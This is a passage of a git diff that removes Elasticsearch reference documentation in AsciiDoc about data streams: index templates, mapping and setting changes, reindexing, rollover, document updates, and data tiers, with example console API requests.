mapping is added to future backing indices created for the stream. -+ --- -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> request adds a mapping -for a new field, `message`, to the template. - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "mappings": { - "properties": { - "message": { <1> - "type": "text" - } - } - } - } -} ----- -<1> Adds a mapping for the new `message` field. --- - -. Use the <> to add the new field mapping -to the data stream. By default, this adds the mapping to the stream's existing -backing indices, including the write index. -+ --- -The following put mapping API request adds the new `message` field mapping to -`my-data-stream`. - -[source,console] ----- -PUT /my-data-stream/_mapping -{ - "properties": { - "message": { - "type": "text" - } - } -} ----- --- -+ -To add the mapping only to the stream's write index, set the put mapping API's -`write_index_only` query parameter to `true`. -+ --- -The following put mapping request adds the new `message` field mapping only to -`my-data-stream`'s write index. The new field mapping is not added to -the stream's other backing indices. - -[source,console] ----- -PUT /my-data-stream/_mapping?write_index_only=true -{ - "properties": { - "message": { - "type": "text" - } - } -} ----- --- - -[discrete] -[[change-existing-field-mapping-in-a-data-stream]] -=== Change an existing field mapping in a data stream - -The documentation for each <> indicates -whether you can update it for an existing field using the -<>. To update these parameters for an -existing field, follow these steps: - -. Update the index template used by the data stream. This ensures the updated -field mapping is added to future backing indices created for the stream. -+ --- -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> request changes the -argument for the `host.ip` field's <> -mapping parameter to `true`. - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "mappings": { - "properties": { - "host": { - "properties": { - "ip": { - "type": "ip", - "ignore_malformed": true <1> - } - } - } - } - } - } -} ----- -<1> Changes the `host.ip` field's `ignore_malformed` value to `true`. --- - -. Use the <> to apply the mapping changes -to the data stream. By default, this applies the changes to the stream's -existing backing indices, including the write index. -+ --- -The following <> request targets -`my-data-stream`. The request changes the argument for the `host.ip` -field's `ignore_malformed` mapping parameter to `true`. - -[source,console] ----- -PUT /my-data-stream/_mapping -{ - "properties": { - "host": { - "properties": { - "ip": { - "type": "ip", - "ignore_malformed": true - } - } - } - } -} ----- --- -+ -To apply the mapping changes only to the stream's write index, set the put -mapping API's `write_index_only` query parameter to `true`. -+ --- -The following put mapping request changes the `host.ip` field's mapping only for -`my-data-stream`'s write index. The change is not applied to the -stream's other backing indices. - -[source,console] ----- -PUT /my-data-stream/_mapping?write_index_only=true -{ - "properties": { - "host": { - "properties": { - "ip": { - "type": "ip", - "ignore_malformed": true - } - } - } - } -} ----- --- - -Except for supported mapping parameters, we don't recommend you change the -mapping or field data type of existing fields, even in a data stream's matching -index template or its backing indices. Changing the mapping of an existing -field could invalidate any data that’s already indexed. - -If you need to change the mapping of an existing field, create a new -data stream and reindex your data into it. See -<>. - -[discrete] -[[change-dynamic-index-setting-for-a-data-stream]] -=== Change a dynamic index setting for a data stream - -To change a <> for a data stream, -follow these steps: - -. Update the index template used by the data stream. This ensures the setting is -applied to future backing indices created for the stream. -+ --- -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> request changes the -template's `index.refresh_interval` index setting to `30s` (30 seconds). - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "settings": { - "index.refresh_interval": "30s" <1> - } - } -} ----- -<1> Changes the `index.refresh_interval` setting to `30s` (30 seconds). --- - -. Use the <> to update the -index setting for the data stream. By default, this applies the setting to -the stream's existing backing indices, including the write index. -+ --- -The following update index settings API request updates the -`index.refresh_interval` setting for `my-data-stream`. - -[source,console] ----- -PUT /my-data-stream/_settings -{ - "index": { - "refresh_interval": "30s" - } -} ----- --- - -[discrete] -[[change-static-index-setting-for-a-data-stream]] -=== Change a static index setting for a data stream - -<> can only be set when a backing -index is created. You cannot update static index settings using the -<>. - -To apply a new static setting to future backing indices, update the index -template used by the data stream. The setting is automatically applied to any -backing index created after the update. - -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> requests adds new -`sort.field` and `sort.order index` settings to the template. - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "settings": { - "sort.field": [ "@timestamp"], <1> - "sort.order": [ "desc"] <2> - } - } -} ----- -<1> Adds the `sort.field` index setting. -<2> Adds the `sort.order` index setting. - -If wanted, you can <> to immediately apply the setting to the data stream’s write index. This -affects any new data added to the stream after the rollover. However, it does -not affect the data stream's existing backing indices or existing data. - -To apply static setting changes to existing backing indices, you must create a -new data stream and reindex your data into it. See -<>. - -[discrete] -[[data-streams-use-reindex-to-change-mappings-settings]] -=== Use reindex to change mappings or settings - -You can use a reindex to change the mappings or settings of a data stream. This -is often required to change the data type of an existing field or update static -index settings for backing indices. - -To reindex a data stream, first create or update an index template so that it -contains the wanted mapping or setting changes. You can then reindex the -existing data stream into a new stream matching the template. This applies the -mapping and setting changes in the template to each document and backing index -added to the new data stream. These changes also affect any future backing -index created by the new stream. - -Follow these steps: - -. Choose a name or index pattern for a new data stream. This new data -stream will contain data from your existing stream. -+ -You can use the resolve index API to check if the name or pattern matches any -existing indices, index aliases, or data streams. If so, you should consider -using another name or pattern. --- -The following resolve index API request checks for any existing indices, index -aliases, or data streams that start with `new-data-stream`. If not, the -`new-data-stream*` index pattern can be used to create a new data stream. - -[source,console] ----- -GET /_resolve/index/new-data-stream* ----- - -The API returns the following response, indicating no existing targets match -this pattern. - -[source,console-result] ----- -{ - "indices": [ ], - "aliases": [ ], - "data_streams": [ ] -} ----- -// TESTRESPONSE[s/"data_streams": \[ \]/"data_streams": $body.data_streams/] --- - -. Create or update an index template. This template should contain the -mappings and settings you'd like to apply to the new data stream's backing -indices. -+ -This index template must meet the -<>. It -should also contain your previously chosen name or index pattern in the -`index_patterns` property. -+ -TIP: If you are only adding or changing a few things, we recommend you create a -new template by copying an existing one and modifying it as needed. -+ --- -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> request creates a new -index template, `new-data-stream-template`. `new-data-stream-template` -uses `my-data-stream-template` as its basis, with the following -changes: - -* The index pattern in `index_patterns` matches any index or data stream - starting with `new-data-stream`. -* The `@timestamp` field mapping uses the `date_nanos` field data type rather - than the `date` data type. -* The template includes `sort.field` and `sort.order` index settings, which were - not in the original `my-data-stream-template` template. - -[source,console] ----- -PUT /_index_template/new-data-stream-template -{ - "index_patterns": [ "new-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "mappings": { - "properties": { - "@timestamp": { - "type": "date_nanos" <1> - } - } - }, - "settings": { - "sort.field": [ "@timestamp"], <2> - "sort.order": [ "desc"] <3> - } - } -} ----- -<1> Changes the `@timestamp` field mapping to the `date_nanos` field data type. -<2> Adds the `sort.field` index setting. -<3> Adds the `sort.order` index setting. --- - -. Use the <> to manually -create the new data stream. The name of the data stream must match the index -pattern defined in the new template's `index_patterns` property. -+ -We do not recommend <>. Later, you will reindex older data from an -existing data stream into this new stream. This could result in one or more -backing indices that contains a mix of new and old data. -+ -[[data-stream-mix-new-old-data]] -.Mixing new and old data in a data stream -[IMPORTANT] -==== -While mixing new and old data is safe, it could interfere with data retention. -If you delete older indices, you could accidentally delete a backing index that -contains both new and old data. To prevent premature data loss, you would need -to retain such a backing index until you are ready to delete its newest data. -==== -+ --- -The following create data stream API request targets `new-data-stream`, which -matches the index pattern for `new-data-stream-template`. -Because no existing index or data stream uses this name, this request creates -the `new-data-stream` data stream. - -[source,console] ----- -PUT /_data_stream/new-data-stream ----- -// TEST[s/new-data-stream/new-data-stream-two/] --- - -. If you do not want to mix new and old data in your new data stream, pause the -indexing of new documents. While mixing old and new data is safe, it could -interfere with data retention. See <>. - -. If you use {ilm-init} to <>, reduce the {ilm-init} poll interval. This ensures the current write -index doesn’t grow too large while waiting for the rollover check. By default, -{ilm-init} checks rollover conditions every 10 minutes. -+ --- -The following <> request -lowers the `indices.lifecycle.poll_interval` setting to `1m` (one minute). - -[source,console] ----- -PUT /_cluster/settings -{ - "transient": { - "indices.lifecycle.poll_interval": "1m" - } -} ----- --- - -. Reindex your data to the new data stream using an `op_type` of `create`. -+ -If you want to partition the data in the order in which it was originally -indexed, you can run separate reindex requests. These reindex requests can use -individual backing indices as the source. You can use the -<> to retrieve a list of backing -indices. -+ --- -For example, you plan to reindex data from `my-data-stream` into -`new-data-stream`. However, you want to submit a separate reindex request for -each backing index in `my-data-stream`, starting with the oldest backing index. -This preserves the order in which the data was originally indexed. - -The following get data stream API request retrieves information about -`my-data-stream`, including a list of its backing indices. - -[source,console] ----- -GET /_data_stream/my-data-stream ----- - -The API returns the following response. Note the `indices` property contains an -array of the stream's current backing indices. The first item in the array -contains information about the stream's oldest backing index, -`.ds-my-data-stream-000001`. - -[source,console-result] ----- -{ - "data_streams": [ - { - "name": "my-data-stream", - "timestamp_field": { - "name": "@timestamp" - }, - "indices": [ - { - "index_name": ".ds-my-data-stream-000001", <1> - "index_uuid": "Gpdiyq8sRuK9WuthvAdFbw" - }, - { - "index_name": ".ds-my-data-stream-000002", - "index_uuid": "_eEfRrFHS9OyhqWntkgHAQ" - } - ], - "generation": 2, - "status": "GREEN", - "template": "my-data-stream-template" - } - ] -} ----- -// TESTRESPONSE[s/"index_uuid": "Gpdiyq8sRuK9WuthvAdFbw"/"index_uuid": $body.data_streams.0.indices.0.index_uuid/] -// TESTRESPONSE[s/"index_uuid": "_eEfRrFHS9OyhqWntkgHAQ"/"index_uuid": $body.data_streams.0.indices.1.index_uuid/] -// TESTRESPONSE[s/"status": "GREEN"/"status": "YELLOW"/] - -<1> First item in the `indices` array for `my-data-stream`. This -item contains information about the stream's oldest backing index, -`.ds-my-data-stream-000001`. - -The following <> request copies documents from -`.ds-my-data-stream-000001` to `new-data-stream`. Note the request's `op_type` -is `create`. - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": ".ds-my-data-stream-000001" - }, - "dest": { - "index": "new-data-stream", - "op_type": "create" - } -} ----- --- -+ -You can also use a query to reindex only a subset of documents with each -request. -+ --- -The following <> request copies documents from -`my-data-stream` to `new-data-stream`. The request -uses a <> to only reindex documents with a -timestamp within the last week. Note the request's `op_type` is `create`. - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "my-data-stream", - "query": { - "range": { - "@timestamp": { - "gte": "now-7d/d", - "lte": "now/d" - } - } - } - }, - "dest": { - "index": "new-data-stream", - "op_type": "create" - } -} ----- --- - -. If you previously changed your {ilm-init} poll interval, change it back to its -original value when reindexing is complete. This prevents unnecessary load on -the master node. -+ --- -The following update cluster settings API request resets the -`indices.lifecycle.poll_interval` setting to its default value, 10 minutes. - -[source,console] ----- -PUT /_cluster/settings -{ - "transient": { - "indices.lifecycle.poll_interval": null - } -} ----- --- - -. Resume indexing using the new data stream. Searches on this stream will now -query your new data and the reindexed data. - -. Once you have verified that all reindexed data is available in the new -data stream, you can safely remove the old stream. -+ --- -The following <> request -deletes `my-data-stream`. This request also deletes the stream's -backing indices and any data they contain. - -[source,console] ----- -DELETE /_data_stream/my-data-stream ----- --- diff --git a/docs/reference/data-streams/data-stream-apis.asciidoc b/docs/reference/data-streams/data-stream-apis.asciidoc deleted file mode 100644 index 04a5a281c22..00000000000 --- a/docs/reference/data-streams/data-stream-apis.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -[role="xpack"] -[[data-stream-apis]] -== Data stream APIs - -The following APIs are available for managing <>: - -* <> -* <> -* <> -* <> - -For concepts and tutorials, see <>. - -include::{es-repo-dir}/indices/create-data-stream.asciidoc[] - -include::{es-repo-dir}/indices/delete-data-stream.asciidoc[] - -include::{es-repo-dir}/indices/get-data-stream.asciidoc[] - -include::{es-repo-dir}/indices/data-stream-stats.asciidoc[] \ No newline at end of file diff --git a/docs/reference/data-streams/data-streams.asciidoc b/docs/reference/data-streams/data-streams.asciidoc deleted file mode 100644 index 96e7ab26f72..00000000000 --- a/docs/reference/data-streams/data-streams.asciidoc +++ /dev/null @@ -1,131 +0,0 @@ -[role="xpack"] -[[data-streams]] -= Data streams -++++ -Data streams -++++ - -A data stream lets you store append-only time series -data across multiple indices while giving you a single named resource for -requests. Data streams are well-suited for logs, events, metrics, and other -continuously generated data. - -You can submit indexing and search requests directly to a data stream. The -stream automatically routes the request to backing indices that store the -stream's data. You can use <> to -automate the management of these backing indices. For example, you can use -{ilm-init} to automatically move older backing indices to less expensive -hardware and delete unneeded indices. {ilm-init} can help you reduce costs and -overhead as your data grows. - -[discrete] -[[backing-indices]] -== Backing indices - -A data stream consists of one or more <>, auto-generated -backing indices. - -image::images/data-streams/data-streams-diagram.svg[align="center"] - -Each data stream requires a matching <>. The -template contains the mappings and settings used to configure the stream's -backing indices. - -Every document indexed to a data stream must contain a `@timestamp` field, -mapped as a <> or <> field type. If the -index template doesn't specify a mapping for the `@timestamp` field, {es} maps -`@timestamp` as a `date` field with default options. - -The same index template can be used for multiple data streams. You cannot -delete an index template in use by a data stream. - -[discrete] -[[data-stream-read-requests]] -== Read requests - -When you submit a read request to a data stream, the stream routes the request -to all its backing indices. - -image::images/data-streams/data-streams-search-request.svg[align="center"] - -[discrete] -[[data-stream-write-index]] -== Write index - -The most recently created backing index is the data stream’s write index. -The stream adds new documents to this index only. - -image::images/data-streams/data-streams-index-request.svg[align="center"] - -You cannot add new documents to other backing indices, even by sending requests -directly to the index. - -You also cannot perform operations on a write index that may hinder indexing, -such as: - -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[data-streams-rollover]] -== Rollover - -When you create a data stream, {es} automatically creates a backing index for -the stream. This index also acts as the stream's first write index. A -<> creates a new backing index that becomes the -stream's new write index. - -We recommend using <> to automatically -roll over data streams when the write index reaches a specified age or size. -If needed, you can also <> -a data stream. - - -[discrete] -[[data-streams-generation]] -== Generation - -Each data stream tracks its generation: a six-digit, zero-padded integer that -acts as a cumulative count of the stream's rollovers, starting at `000001`. - -When a backing index is created, the index is named using the following -convention: - -[source,text] ----- -.ds-- ----- - -Backing indices with a higher generation contain more recent data. For example, -the `web-server-logs` data stream has a generation of `34`. The stream's most -recent backing index is named `.ds-web-server-logs-000034`. - -Some operations, such as a <> or -<>, can change a backing index's name. -These name changes do not remove a backing index from its data stream. - -[discrete] -[[data-streams-append-only]] -== Append-only - -Data streams are designed for use cases where existing data is rarely, -if ever, updated. You cannot send update or deletion requests for existing -documents directly to a data stream. Instead, use the -<> and -<> APIs. - -If needed, you can <> by submitting requests directly to the document's backing index. - -TIP: If you frequently update or delete existing documents, use an -<> and <> -instead of a data stream. You can still use -<> to manage indices for the alias. - -include::set-up-a-data-stream.asciidoc[] -include::use-a-data-stream.asciidoc[] -include::change-mappings-and-settings.asciidoc[] diff --git a/docs/reference/data-streams/set-up-a-data-stream.asciidoc b/docs/reference/data-streams/set-up-a-data-stream.asciidoc deleted file mode 100644 index 09b8f9c0f02..00000000000 --- a/docs/reference/data-streams/set-up-a-data-stream.asciidoc +++ /dev/null @@ -1,227 +0,0 @@ -[role="xpack"] -[[set-up-a-data-stream]] -== Set up a data stream - -To set up a data stream, follow these steps: - -. <>. -. <>. -. <>. -. <>. - -[discrete] -[[configure-a-data-stream-ilm-policy]] -=== Optional: Configure an {ilm-init} lifecycle policy - -While optional, we recommend you configure an <> to automate the management of your data stream's backing -indices. - -In {kib}, open the menu and go to *Stack Management > Index Lifecycle Policies*. -Click *Index Lifecycle Policies*. - -[role="screenshot"] -image::images/ilm/create-policy.png[Index Lifecycle Policies page] - -[%collapsible] -.API example -==== -Use the <> to configure a policy: - -[source,console] ----- -PUT /_ilm/policy/my-data-stream-policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover": { - "max_size": "25GB" - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} ----- -==== - -[discrete] -[[create-a-data-stream-template]] -=== Create an index template - -. In {kib}, open the menu and go to *Stack Management > Index Management*. -. In the *Index Templates* tab, click *Create template*. -. In the Create template wizard, use the *Data stream* toggle to indicate the -template is used for data streams. -. Use the wizard to finish defining your template. Specify: - -* One or more index patterns that match the data stream's name. - -* Mappings and settings for the stream's backing indices. - -* A priority for the index template -+ -[IMPORTANT] -==== -{es} has built-in index templates for the `metrics-*-*`, `logs-*-*`, and -`synthetics-*-*` index patterns, each with a priority of `100`. -{ingest-guide}/fleet-overview.html[{agent}] uses these templates to -create data streams. - -If you use {agent}, assign your index templates a priority lower than `100` to -avoid overriding the built-in templates. Otherwise, use a non-overlapping index -pattern or assign templates with an overlapping pattern a `priority` higher than -`100`. - -For example, if you don't use {agent} and want to create a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== - -If the index template doesn't specify a mapping for the `@timestamp` field, {es} -maps `@timestamp` as a `date` field with default options. - -If using {ilm-init}, specify your lifecycle policy in the `index.lifecycle.name` -setting. - -TIP: Carefully consider your template's mappings and settings. Later changes may -require reindexing. See <>. - -[role="screenshot"] -image::images/data-streams/create-index-template.png[Create template page] - -[%collapsible] -.API example -==== -Use the <> to create an index -template. The template must include an empty `data_stream` object, indicating -it's used for data streams. - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "settings": { - "index.lifecycle.name": "my-data-stream-policy" - } - } -} ----- -// TEST[continued] -==== - -[discrete] -[[create-a-data-stream]] -=== Create the data stream - -To automatically create the data stream, submit an -<> to the stream. The stream's -name must match one of your template's index patterns. - -[source,console] ----- -POST /my-data-stream/_doc/ -{ - "@timestamp": "2020-12-06T11:04:05.000Z", - "user": { - "id": "vlb44hny" - }, - "message": "Login attempt failed" -} ----- -// TEST[continued] - -You can also use the <> to -manually create the data stream. The stream's name must match one of your -template's index patterns. - -[source,console] ----- -PUT /_data_stream/my-data-stream ----- -// TEST[continued] -// TEST[s/my-data-stream/my-data-stream-alt/] - -[discrete] -[[secure-a-data-stream]] -=== Secure the data stream - -To control access to the data stream and its -data, use <>. - -[discrete] -[[get-info-about-a-data-stream]] -=== Get information about a data stream - -In {kib}, open the menu and go to *Stack Management > Index Management*. In the -*Data Streams* tab, click the data stream's name. - -[role="screenshot"] -image::images/data-streams/data-streams-list.png[Data Streams tab] - -[%collapsible] -.API example -==== -Use the <> to retrieve information -about one or more data streams: - -//// -[source,console] ----- -POST /my-data-stream/_rollover/ ----- -// TEST[continued] -//// - -[source,console] ----- -GET /_data_stream/my-data-stream ----- -// TEST[continued] -==== - -[discrete] -[[delete-a-data-stream]] -=== Delete a data stream - -To delete a data stream and its backing indices, open the {kib} menu and go to -*Stack Management > Index Management*. In the *Data Streams* tab, click the -trash can icon. - -[role="screenshot"] -image::images/data-streams/data-streams-list.png[Data Streams tab] - -[%collapsible] -.API example -==== -Use the <> to delete a data -stream and its backing indices: - -[source,console] ----- -DELETE /_data_stream/my-data-stream ----- -// TEST[continued] -==== - -//// -[source,console] ----- -DELETE /_data_stream/* -DELETE /_index_template/* -DELETE /_ilm/policy/my-data-stream-policy ----- -// TEST[continued] -//// diff --git a/docs/reference/data-streams/use-a-data-stream.asciidoc b/docs/reference/data-streams/use-a-data-stream.asciidoc deleted file mode 100644 index 544cc32d31f..00000000000 --- a/docs/reference/data-streams/use-a-data-stream.asciidoc +++ /dev/null @@ -1,351 +0,0 @@ -[role="xpack"] -[[use-a-data-stream]] -== Use a data stream - -After you <>, you can do -the following: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -//// -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { } -} - -PUT /_data_stream/my-data-stream - -POST /my-data-stream/_rollover/ - -POST /my-data-stream/_rollover/ - -PUT /my-data-stream/_create/bfspvnIBr7VVZlfp2lqX?refresh=wait_for -{ - "@timestamp": "2020-12-07T11:06:07.000Z", - "user": { - "id": "yWIumJd7" - }, - "message": "Login successful" -} ----- -// TESTSETUP - -[source,console] ----- -DELETE /_data_stream/* - -DELETE /_index_template/* ----- -// TEARDOWN -//// - -[discrete] -[[add-documents-to-a-data-stream]] -=== Add documents to a data stream - -To add an individual document, use the <>. -<> are supported. - -[source,console] ----- -POST /my-data-stream/_doc/ -{ - "@timestamp": "2020-12-07T11:06:07.000Z", - "user": { - "id": "8a4f500d" - }, - "message": "Login successful" -} ----- - -You cannot add new documents to a data stream using the index API's `PUT -//_doc/<_id>` request format. To specify a document ID, use the `PUT -//_create/<_id>` format instead. Only an -<> of `create` is supported. - -To add multiple documents with a single request, use the <>. -Only `create` actions are supported. - -[source,console] ----- -PUT /my-data-stream/_bulk?refresh -{"create":{ }} -{ "@timestamp": "2020-12-08T11:04:05.000Z", "user": { "id": "vlb44hny" }, "message": "Login attempt failed" } -{"create":{ }} -{ "@timestamp": "2020-12-08T11:06:07.000Z", "user": { "id": "8a4f500d" }, "message": "Login successful" } -{"create":{ }} -{ "@timestamp": "2020-12-09T11:07:08.000Z", "user": { "id": "l7gk7f82" }, "message": "Logout successful" } ----- - -[discrete] -[[search-a-data-stream]] -=== Search a data stream - -The following search APIs support data streams: - -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[get-stats-for-a-data-stream]] -=== Get statistics for a data stream - -Use the <> to get -statistics for one or more data streams: - -[source,console] ----- -GET /_data_stream/my-data-stream/_stats?human=true ----- - -[discrete] -[[manually-roll-over-a-data-stream]] -=== Manually roll over a data stream - -Use the <> to manually -<> a data stream: - -[source,console] ----- -POST /my-data-stream/_rollover/ ----- - -[discrete] -[[open-closed-backing-indices]] -=== Open closed backing indices - -You cannot search a <> backing index, even by searching -its data stream. You also cannot <> -or <> documents in a closed index. - -To re-open a closed backing index, submit an <> directly to the index: - -[source,console] ----- -POST /.ds-my-data-stream-000001/_open/ ----- - -To re-open all closed backing indices for a data stream, submit an open index -API request to the stream: - -[source,console] ----- -POST /my-data-stream/_open/ ----- - -[discrete] -[[reindex-with-a-data-stream]] -=== Reindex with a data stream - -Use the <> to copy documents from an -existing index, index alias, or data stream to a data stream. Because data streams are -<>, a reindex into a data stream must use -an `op_type` of `create`. A reindex cannot update existing documents in a data -stream. - -//// -[source,console] ----- -PUT /_bulk?refresh=wait_for -{"create":{"_index" : "archive_1"}} -{ "@timestamp": "2020-12-08T11:04:05.000Z" } -{"create":{"_index" : "archive_2"}} -{ "@timestamp": "2020-12-08T11:06:07.000Z" } -{"create":{"_index" : "archive_2"}} -{ "@timestamp": "2020-12-09T11:07:08.000Z" } -{"create":{"_index" : "archive_2"}} -{ "@timestamp": "2020-12-09T11:07:08.000Z" } - -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "archive_1", "alias" : "archive" } }, - { "add" : { "index" : "archive_2", "alias" : "archive", "is_write_index" : true} } - ] -} ----- -//// - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "archive" - }, - "dest": { - "index": "my-data-stream", - "op_type": "create" - } -} ----- -// TEST[continued] - -[discrete] -[[update-docs-in-a-data-stream-by-query]] -=== Update documents in a data stream by query - -Use the <> to update documents in a -data stream that match a provided query: - -[source,console] ----- -POST /my-data-stream/_update_by_query -{ - "query": { - "match": { - "user.id": "l7gk7f82" - } - }, - "script": { - "source": "ctx._source.user.id = params.new_id", - "params": { - "new_id": "XgdX0NoX" - } - } -} ----- - -[discrete] -[[delete-docs-in-a-data-stream-by-query]] -=== Delete documents in a data stream by query - -Use the <> to delete documents in a -data stream that match a provided query: - -[source,console] ----- -POST /my-data-stream/_delete_by_query -{ - "query": { - "match": { - "user.id": "vlb44hny" - } - } -} ----- - -[discrete] -[[update-delete-docs-in-a-backing-index]] -=== Update or delete documents in a backing index - -If needed, you can update or delete documents in a data stream by sending -requests to the backing index containing the document. You'll need: - -* The <> -* The name of the backing index containing the document -* If updating the document, its <> - -To get this information, use a <>: - -[source,console] ----- -GET /my-data-stream/_search -{ - "seq_no_primary_term": true, - "query": { - "match": { - "user.id": "yWIumJd7" - } - } -} ----- - -Response: - -[source,console-result] ----- -{ - "took": 20, - "timed_out": false, - "_shards": { - "total": 3, - "successful": 3, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 0.2876821, - "hits": [ - { - "_index": ".ds-my-data-stream-000003", <1> - "_type": "_doc", - "_id": "bfspvnIBr7VVZlfp2lqX", <2> - "_seq_no": 0, <3> - "_primary_term": 1, <4> - "_score": 0.2876821, - "_source": { - "@timestamp": "2020-12-07T11:06:07.000Z", - "user": { - "id": "yWIumJd7" - }, - "message": "Login successful" - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 20/"took": $body.took/] -// TESTRESPONSE[s/"max_score": 0.2876821/"max_score": $body.hits.max_score/] -// TESTRESPONSE[s/"_score": 0.2876821/"_score": $body.hits.hits.0._score/] - -<1> Backing index containing the matching document -<2> Document ID for the document -<3> Current sequence number for the document -<4> Primary term for the document - -To update the document, use an <> request with valid -`if_seq_no` and `if_primary_term` arguments: - -[source,console] ----- -PUT /.ds-my-data-stream-000003/_doc/bfspvnIBr7VVZlfp2lqX?if_seq_no=0&if_primary_term=1 -{ - "@timestamp": "2020-12-07T11:06:07.000Z", - "user": { - "id": "8a4f500d" - }, - "message": "Login successful" -} ----- - -To delete the document, use the <>: - -[source,console] ----- -DELETE /.ds-my-data-stream-000003/_doc/bfspvnIBr7VVZlfp2lqX ----- - -To delete or update multiple documents with a single request, use the -<>'s `delete`, `index`, and `update` actions. For `index` -actions, include valid <> arguments. - -[source,console] ----- -PUT /_bulk?refresh -{ "index": { "_index": ".ds-my-data-stream-000003", "_id": "bfspvnIBr7VVZlfp2lqX", "if_seq_no": 0, "if_primary_term": 1 } } -{ "@timestamp": "2020-12-07T11:06:07.000Z", "user": { "id": "8a4f500d" }, "message": "Login successful" } ----- - diff --git a/docs/reference/datatiers.asciidoc b/docs/reference/datatiers.asciidoc deleted file mode 100644 index 26c389dd6a0..00000000000 --- a/docs/reference/datatiers.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[role="xpack"] -[[data-tiers]] -== Data tiers - -A _data tier_ is a collection of nodes with the same data role that -typically share the same hardware profile: - -* <> nodes handle the indexing and query load for content such as a product catalog. -* <> nodes handle the indexing load for time series data such as logs or metrics -and hold your most recent, most-frequently-accessed data. -* <> nodes hold time series data that is accessed less-frequently -and rarely needs to be updated. -* <> nodes hold time series data that is accessed occasionally and not normally updated. - -When you index documents directly to a specific index, they remain on content tier nodes indefinitely. - -When you index documents to a data stream, they initially reside on hot tier nodes. -You can configure <> ({ilm-init}) policies -to automatically transition your time series data through the hot, warm, and cold tiers -according to your performance, resiliency and data retention requirements. - -A node's <> is configured in `elasticsearch.yml`. -For example, the highest-performance nodes in a cluster might be assigned to both the hot and content tiers: - -[source,yaml] --------------------------------------------------- -node.roles: ["data_hot", "data_content"] --------------------------------------------------- - -[discrete] -[[content-tier]] -=== Content tier - -Data stored in the content tier is generally a collection of items such as a product catalog or article archive. -Unlike time series data, the value of the content remains relatively constant over time, -so it doesn't make sense to move it to a tier with different performance characteristics as it ages. -Content data typically has long data retention requirements, and you want to be able to retrieve -items quickly regardless of how old they are. - -Content tier nodes are usually optimized for query performance--they prioritize processing power over IO throughput -so they can process complex searches and aggregations and return results quickly. -While they are also responsible for indexing, content data is generally not ingested at as high a rate -as time series data such as logs and metrics. From a resiliency perspective the indices in this -tier should be configured to use one or more replicas. - -New indices are automatically allocated to the <> unless they are part of a data stream. - -[discrete] -[[hot-tier]] -=== Hot tier - -The hot tier is the {es} entry point for time series data and holds your most-recent, -most-frequently-searched time series data. -Nodes in the hot tier need to be fast for both reads and writes, -which requires more hardware resources and faster storage (SSDs). -For resiliency, indices in the hot tier should be configured to use one or more replicas. - -New indices that are part of a <> are automatically allocated to the -hot tier. - -[discrete] -[[warm-tier]] -=== Warm tier - -Time series data can move to the warm tier once it is being queried less frequently -than the recently-indexed data in the hot tier. -The warm tier typically holds data from recent weeks. -Updates are still allowed, but likely infrequent. -Nodes in the warm tier generally don't need to be as fast as those in the hot tier. -For resiliency, indices in the warm tier should be configured to use one or more replicas. - -[discrete] -[[cold-tier]] -=== Cold tier - -Once data is no longer being updated, it can move from the warm tier to the cold tier where it -stays for the rest of its life. -The cold tier is still a responsive query tier, but data in the cold tier is not normally updated. -As data transitions into the cold tier it can be compressed and shrunken. -For resiliency, indices in the cold tier can rely on -<>, eliminating the need for replicas. - -[discrete] -[[data-tier-allocation]] -=== Data tier index allocation - -When you create an index, by default {es} sets -<> -to `data_content` to automatically allocate the index shards to the content tier. - -When {es} creates an index as part of a <>, -by default {es} sets -<> -to `data_hot` to automatically allocate the index shards to the hot tier. - -You can override the automatic tier-based allocation by specifying -<> -settings in the create index request or index template that matches the new index. - -You can also explicitly set `index.routing.allocation.include._tier_preference` -to opt out of the default tier-based allocation. -If you set the tier preference to `null`, {es} ignores the data tier roles during allocation. - -[discrete] -[[data-tier-migration]] -=== Automatic data tier migration - -{ilm-init} automatically transitions managed -indices through the available data tiers using the <> action. -By default, this action is automatically injected in every phase. -You can explicitly specify the migrate action to override the default behavior, -or use the <> to manually specify allocation rules. diff --git a/docs/reference/docs.asciidoc b/docs/reference/docs.asciidoc deleted file mode 100644 index a860bfc42a0..00000000000 --- a/docs/reference/docs.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ -[[docs]] -== Document APIs - -This section starts with a short introduction to Elasticsearch's <>, followed by a -detailed description of the following CRUD APIs: - -.Single document APIs -* <> -* <> -* <> -* <> - -.Multi-document APIs -* <> -* <> -* <> -* <> -* <> - -NOTE: All CRUD APIs are single-index 